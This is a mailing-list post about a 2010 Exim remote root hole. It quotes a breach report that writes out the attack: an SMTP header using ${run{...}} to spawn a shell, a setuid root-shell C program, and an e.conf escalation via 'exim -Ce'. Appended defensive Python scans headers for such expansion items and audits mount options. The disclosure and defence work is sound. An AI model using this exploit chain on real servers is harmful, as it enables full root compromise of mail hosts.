[exim-dev] Remote root vulnerability in Exim

W B Hacker wbh at conducive.org
Thu Dec 9 04:34:39 UTC 2010


Sergey Kononenko wrote:
> Hi,
>
> While investigating a security breach in the network of my company,

Not just Exim. And I am not convinced it is actually vulnerable.

But get the basics right first:

'Do your own due diligence': research this for yourself and consider applying it, 
modified to suit your OS; e.g. your /dev and fs will certainly differ from mine:

FreeBSD example:

/dev/ufs/6011var	/var    ufs     rw,noexec,nosuid	2 2

OpenBSD example:

/dev/wd0d		/var 	ffs	rw,nodev,noexec,nosuid	1 2

Either way, there should be nothing on /var that needs to be executable.
Ergo, failed attack vector.

QED

See also whatever Linux uses that is equivalent to *BSD 'securelevel', so that these 
mounts (and a host of OTHER things) cannot be altered on a running system.

HTH,

Bill Hacker

> I've
> captured (by tcpdump) the sequence of a successful remote root attack through
> Exim. It was the Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find the email of the current maintainer of Exim, so I've decided to
> write to this mailing list. I don't want to publish all the details of the
> attack before the developers can investigate and fix the vulnerability,
> so I ask the Exim maintainers to contact me and I will send them the complete
> captured sequence of the attack.
> Here I can put a brief sequence of the attack:
>
> EHLO mail.domain.com
> MAIL FROM:<orderruc0e at somedomain.com>
> RCPT TO:<postmaster at targetdomain.com>
> DATA
> MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
> ....
> MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
> HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i<&3>&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i<&4>&0 2>&0'}}........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> ..........
> about 700000 the same strings
> ..........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> MAILbombMAILb
> .
> MAIL FROM:<orderruc0e at somedomain.com>
> RCPT TO:<postmaster at targetdomain.com>
>
> After that the attacker gets a shell with the id of user Debian-exim and cwd
> in /var/spool/exim4.
> Then he puts there a file, setuid, with a trivial execution of a root shell:
> #include <grp.h>
> #include <unistd.h>
>
> /* Once this binary is root-owned with mode 4755 (see e.conf below),
>    running it drops the caller into a root shell. */
> int main(int argc, char *argv[])
> {
>          setuid(0);
>          setgid(0);
>          setgroups(0, NULL);
>          execl("/bin/sh", "sh", (char *)NULL);
>          return 1;   /* only reached if execl fails */
> }
>
> and creates another file, e.conf, with the following content:
> spool_directory = ${run{/bin/chown root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}
>
> then he runs:
> exim -Ce.conf -q
>
> and gets the suid bit on /var/spool/exim4/setuid;
> everything else is trivial.
>
> I haven't reproduced the remote part of the attack, but the escalation from Debian-exim to
> root also works on exim4-daemon-light 4.72-2 from Debian Squeeze.
>
> With best regards,
> Sergey Kononenko.
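As an added example (not code from the report above or from Exim itself), here is a small scanner that takes a captured DATA section like the one above and flags what a mail-side filter or a log-review script would want to catch: `${run{...}}` and related expansion items inside header values, plus an abnormal number or volume of header lines. The sample message is constructed from the sequence above with only 2000 of the padding lines; the list of items beyond `run`, the two thresholds and the end-of-headers rule are this example's own assumptions, not Exim's behaviour.

```python
import re
from dataclasses import dataclass, field

# Expansion items that run a command or read a file or socket. ${run{...}} is
# the one in the captured attack; the others are this example's assumption
# that none of them belongs in a header line either.
DANGEROUS_ITEMS = ("run", "readfile", "readsocket", "dlfunc", "perl")
EXPANSION_RE = re.compile(r"\$\{(" + "|".join(DANGEROUS_ITEMS) + r")\{", re.IGNORECASE)

# Constructed stand-in for the captured DATA section: 54 padding headers, the
# HeaderX line with its two ${run{...}} items, and 2000 of the body padding
# lines (the real capture had about 700000).
SAMPLE_DATA = (
    "Received: from mail.domain.com\r\n"
    + "".join(f"MAILbombhdr{i:04d}: " + "M4iLB0mb" * 12 + "\r\n" for i in range(1, 55))
    + "HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i<&3>&0 2>&0'}}"
    + "${run{/bin/sh -c 'exec /bin/sh -i<&4>&0 2>&0'}}\r\n"
    + ("MAILbomb" * 10 + "\r\n") * 2000
)
CLEAN_DATA = "From: a@example.org\r\nSubject: hello\r\n\r\nbody text\r\n"


@dataclass
class Finding:
    header: str   # header field name
    item: str     # expansion item found, e.g. "run"
    snippet: str  # start of the offending value, for the log line


@dataclass
class Report:
    header_count: int
    header_bytes: int
    body_lines: int
    findings: list = field(default_factory=list)

    def reasons(self, max_headers=100, max_header_bytes=64 * 1024):
        """Reasons to reject or quarantine the message; an empty list means clean.
        The two limits are assumed values, not Exim defaults."""
        out = [f"${{{f.item}{{ in header {f.header!r}: {f.snippet}" for f in self.findings]
        if self.header_count > max_headers:
            out.append(f"{self.header_count} header lines (limit {max_headers})")
        if self.header_bytes > max_header_bytes:
            out.append(f"{self.header_bytes} header bytes (limit {max_header_bytes})")
        return out


def split_message(data):
    """Split a DATA section into unfolded (name, value) headers and body lines.
    Headers end at the first blank line; a non-folded line without a colon is
    taken to start the body (the padding lines in the capture have no colon)."""
    lines = data.splitlines()
    headers, i = [], 0
    while i < len(lines):
        line = lines[i]
        if line == "":
            i += 1
            break
        if line[0] in " \t" and headers:      # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
        else:
            break
        i += 1
    return headers, lines[i:]


def scan_data(data):
    """Scan one message's DATA section and return a Report."""
    headers, body = split_message(data)
    report = Report(header_count=len(headers),
                    header_bytes=sum(len(n) + 2 + len(v) for n, v in headers),
                    body_lines=len(body))
    for name, value in headers:
        for m in EXPANSION_RE.finditer(value):
            report.findings.append(Finding(name, m.group(1).lower(),
                                           value[m.start():m.start() + 60]))
    return report


if __name__ == "__main__":
    for label, data in (("sample", SAMPLE_DATA), ("clean", CLEAN_DATA)):
        rep = scan_data(data)
        print(f"{label}: {rep.header_count} headers, {rep.body_lines} body lines")
        for reason in rep.reasons():
            print("  REJECT:", reason)
```

Run against the constructed sample it reports both `${run{` items on `HeaderX`; lowering `max_headers` to 50 adds a third reason for the 56 header lines. The header-count and header-size checks are there because the padding is what makes the captured sequence unusual even before the expansion string appears.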
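As an added example of the mount check the reply above argues for (not code from either poster), here is a script that resolves which filesystem a directory actually lives on from a /proc/mounts-style table and reports which of `nosuid` and `noexec` that filesystem lacks. The mount tables are constructed for the demonstration, and the choice of `/var/spool/exim4`, `/tmp` and `/dev/shm` as targets is an assumption.

```python
import os
import re

# Mount options the spool filesystem should carry, following the fstab lines
# in the reply above (nodev is there too, but it is not what defeats a setuid
# binary or an executable dropped into the spool).
REQUIRED_OPTIONS = ("nosuid", "noexec")

# Constructed /proc/mounts-style tables for the demonstration; they are not
# copied from any real host. The odd mount point exercises the \040 escape
# that /proc/mounts uses for a space.
HARDENED_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /var ext4 rw,nosuid,noexec,nodev,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,noexec,nodev 0 0
"""
DEFAULT_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /var ext4 rw,relatime 0 0
/dev/sda3 /var/with\\040space ext4 rw,nosuid 0 0
"""


def _unescape(field):
    """Decode the octal escapes (\\040 space, \\011 tab, ...) used in /proc/mounts."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mounts(text):
    """Return a list of (device, mountpoint, fstype, set_of_options) tuples."""
    table = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0].startswith("#"):
            continue
        device, mountpoint, fstype, options = parts[:4]
        table.append((_unescape(device), _unescape(mountpoint), fstype,
                      set(options.split(","))))
    return table


def mount_for(path, table):
    """Pick the mount that actually holds `path`: the longest mount point that
    is a component-wise prefix of it, so /var does not claim /variant."""
    path = os.path.normpath(path)
    best = None
    for entry in table:
        mp = entry[1]
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best[1]):
                best = entry
    return best


def missing_options(path, mounts_text, required=REQUIRED_OPTIONS):
    """Return (mountpoint, sorted list of required options that mount lacks)."""
    entry = mount_for(path, parse_mounts(mounts_text))
    if entry is None:
        raise ValueError(f"no mount covers {path}")
    return entry[1], sorted(o for o in required if o not in entry[3])


if __name__ == "__main__":
    # On a live Linux host, audit the Exim spool and the usual writable
    # directories against the real mount table; elsewhere fall back to the
    # constructed default table so the script still runs.
    try:
        with open("/proc/mounts") as fh:
            live = fh.read()
    except OSError:
        live = DEFAULT_MOUNTS
    for target in ("/var/spool/exim4", "/tmp", "/dev/shm"):
        try:
            mp, missing = missing_options(target, live)
        except ValueError as exc:
            print(f"{target}: {exc}")
            continue
        print(f"{target}: on {mp}: " + ("ok" if not missing else "missing " + ",".join(missing)))
```

Resolving by longest component-wise prefix matters: a plain `startswith("/var")` would report `/variant` as covered by `/var`'s options. Note what the check does and does not establish. `nosuid` on the spool filesystem stops the kernel from honouring the 4755 bit on `/var/spool/exim4/setuid`, but the `e.conf` trick in the report chowns and chmods whatever path it names, so every other filesystem the Debian-exim user can write to needs the same options, which is why the audit loop above covers `/tmp` and `/dev/shm` as well.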




More information about the Pkg-exim4-maintainers mailing list